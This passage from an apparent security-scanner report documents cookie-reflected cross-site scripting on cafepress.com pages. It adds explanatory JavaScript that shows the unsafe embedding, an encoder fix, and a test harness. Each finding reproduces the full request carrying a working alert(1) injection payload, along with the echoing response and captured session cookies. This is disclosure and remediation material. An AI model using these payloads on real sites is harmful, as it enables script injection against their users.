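  return hits;
}

// A finding is confirmed when the payload came back byte-for-byte inside a
// script block: the HTML parser will then close the <script> element at the
// injected "</script" whatever JavaScript quoting is in effect.
function confirmedScriptReflections(body, canary) {
  return findReflections(body, canary).filter((h) => h.unmodified && h.region === 'script');
}
```

Run against the captured body, `confirmedScriptReflections(SAMPLE_RESPONSE, CANARY)` returns the one echo inside the single-quoted searchTerm literal; against the hypothetical fixed body it returns nothing, because the echo is still present but no longer equals the payload.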

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
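An added example, not code from the report or from CafePress, covering the cp_st findings (single-quoted string, payload of the form 197e0</script><script>alert(1)</script>ccc939a9ef5) and the cp-v findings (double-quoted string, payload of the form e199a"-alert(1)-"33c6f5a13e) in 1.94 through 1.101: the two embedding templates mirror the reflection points in the responses above, encodeForJsString is the fix the remediation text calls for when the value genuinely has to be emitted inside a script, and render splits and executes the resulting script blocks the way a browser would, with stand-ins for the page's globals. The function names and the harness are assumptions for illustration.

```javascript
// Added example (not CafePress code): the unsafe embedding the scanner found,
// an encoder for the JavaScript-string context, and a harness that runs the
// resulting <script> blocks the way a browser would split them.

// Templates matching the two reflection points in the responses above.
function embedSingleQuoted(value) {
  return "<script>window.cafepress.tealeaf.searchTerm = '" + value + "'</script>";
}
function embedDoubleQuoted(value) {
  return '<script>s.eVar30 = "' + value + '";</script>';
}

// Encoder for a value placed inside a JS string literal. JSON.stringify
// escapes the backslash, double quote and control characters; the second pass
// \u-escapes the single quote, backtick, "<" and ">" (so "</script" can never
// appear in the output) and U+2028/U+2029, which older engines treat as line
// terminators even inside a string.
function encodeForJsString(value) {
  return JSON.stringify(String(value))
    .slice(1, -1)
    .replace(/[<>'`\u2028\u2029]/g, (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The HTML tokenizer ends script data at the first "</script", regardless of
// any JavaScript quoting, which is why a quote-aware fix alone is not enough.
function scriptBodies(html) {
  const bodies = [];
  const re = /<script>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Run each script block with stand-ins for the page globals and count
// alert() calls and syntax errors, mirroring what the browser would do.
function render(html) {
  const env = { window: { cafepress: { tealeaf: {} } }, s: {}, alerts: 0 };
  const alert = () => { env.alerts += 1; };
  let syntaxErrors = 0;
  for (const body of scriptBodies(html)) {
    let fn;
    try {
      fn = new Function('window', 's', 'alert', body);
    } catch (e) {
      if (e instanceof SyntaxError) { syntaxErrors += 1; continue; }
      throw e;
    }
    fn(env.window, env.s, alert);
  }
  return { alerts: env.alerts, syntaxErrors, window: env.window, s: env.s };
}

// The cookie values exactly as the scanner submitted them (cp_st and cp-v).
const CP_ST_PAYLOAD = '197e0</script><script>alert(1)</script>ccc939a9ef5';
const CP_V_PAYLOAD = 'D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e';

function demo() {
  return {
    naiveSingle: render(embedSingleQuoted(CP_ST_PAYLOAD)), // alert fires from a second script block
    naiveDouble: render(embedDoubleQuoted(CP_V_PAYLOAD)),  // alert fires inside the first
    safeSingle: render(embedSingleQuoted(encodeForJsString(CP_ST_PAYLOAD))),
    safeDouble: render(embedDoubleQuoted(encodeForJsString(CP_V_PAYLOAD))),
  };
}
```

The single-quoted case is the instructive one: escaping the quote character alone would not help, because the HTML tokenizer closes the <script> element at the injected </script before the JavaScript engine ever sees the string, leaving an unterminated literal in the first block and a fresh block containing alert(1). The encoder therefore has to take < and > out of the output as well. Where the value can be carried in a data- attribute or fetched as JSON at runtime instead of being inlined into script, that is the better option, as the remediation text says.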

Request

GET /make/custom-buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd08c3"-alert(1)-"5c9b7d83b0c; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 54737
Date: Sun, 26 Dec 2010 13:48:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd08c3"-alert(1)-"5c9b7d83b0c";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.101. http://www.cafepress.com/make/custom-buttons [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-buttons

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 467e9</script><script>alert(1)</script>f97ce1fac6a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=467e9</script><script>alert(1)</script>f97ce1fac6a; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 54759
Date: Sun, 26 Dec 2010 13:48:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '467e9</script><script>alert(1)</script>f97ce1fac6a'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.102. http://www.cafepress.com/make/custom-hats [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-hats

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1aa5"-alert(1)-"c0e3e257a86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-hats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAb1aa5"-alert(1)-"c0e3e257a86; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 54696
Date: Sun, 26 Dec 2010 13:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb1aa5"-alert(1)-"c0e3e257a86";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.103. http://www.cafepress.com/make/custom-hats [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-hats

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a30c5</script><script>alert(1)</script>e0b31c17436 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-hats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a30c5</script><script>alert(1)</script>e0b31c17436; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 54711
Date: Sun, 26 Dec 2010 13:48:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'a30c5</script><script>alert(1)</script>e0b31c17436'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.104. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-hoodies-sweatshirts

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5222"-alert(1)-"66934ad12b9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-hoodies-sweatshirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAb5222"-alert(1)-"66934ad12b9; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 69614
Date: Sun, 26 Dec 2010 13:47:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 69614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb5222"-alert(1)-"66934ad12b9";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.105. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-hoodies-sweatshirts

Issue detail

